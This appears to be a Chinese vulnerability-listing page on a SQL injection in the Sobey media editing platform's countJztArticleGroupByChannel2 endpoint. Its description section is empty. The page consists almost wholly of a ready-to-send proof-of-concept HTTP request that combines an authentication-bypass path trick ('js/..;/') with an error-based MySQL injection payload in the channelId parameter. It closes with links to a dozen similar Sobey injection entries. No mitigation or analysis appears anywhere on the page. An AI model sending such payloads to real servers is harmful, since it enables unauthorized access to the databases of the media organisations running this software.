索贝融媒体 /sobey-mchEditor/mch/Jzt/statistics/countJztArticleGroupByChannel2 SQL 注入漏洞

漏洞描述

PoC代码

GET /sobey-mchEditor/js/..;/mch/Jzt/statistics/countJztArticleGroupByChannel2?siteCode=&token=&userCode=admin&channelId=1&catalogid=1&channelId=1+AND+GTID_SUBSET%28CONCAT%280x7e%2C%28SELECT+%28ELT%281709%3D1709%2C1%29%29%29%2Cmd5%281%29%29%2C1709%29 HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

相关漏洞推荐

• 索贝融媒体 /sobey-mchEditor/count/getCountByCode SQL 注入漏洞
• 索贝融媒体 /sobey-mchEditor/mch/Articlelist/articleExamineExport SQL 注入漏洞
• 索贝融媒体 /sobey-mchEditor/mch/jztEditorScore/queryEditorScoreRank SQL 注入漏洞
• 索贝融媒体 /sobey-mchEditor/count/catalogArticles SQL 注入漏洞
• 索贝融媒体 /sobey-mchEditor/mch/WXArticleInt/restore SQL注入漏洞
• 索贝 /sobey-mchEditor/mch/statistics/countWxarticleByChannel SQL 注入漏洞
• 索贝融媒体 /news-adapter/rest/s/doc/queryBySQL SQL 注入漏洞
• POC 索贝融媒体getCountByCode存在SQL注入漏洞
• 索贝内容管理系统 /sobey-mchEditor/mch/statistics 多个SQL 注入漏洞
• 索贝融媒体 /sobey-mchEditor/tianma/op SQL注入漏洞
• POC suobei-rongmeiti-countjzt-articlegroupbychannel2-sqli: 索贝融媒体countJztArticleGroupByChannel2 SQL注入漏洞
• 索贝融媒体 getList SQL注入漏洞
• 索贝融媒体 getLlistQuery SQL注入漏洞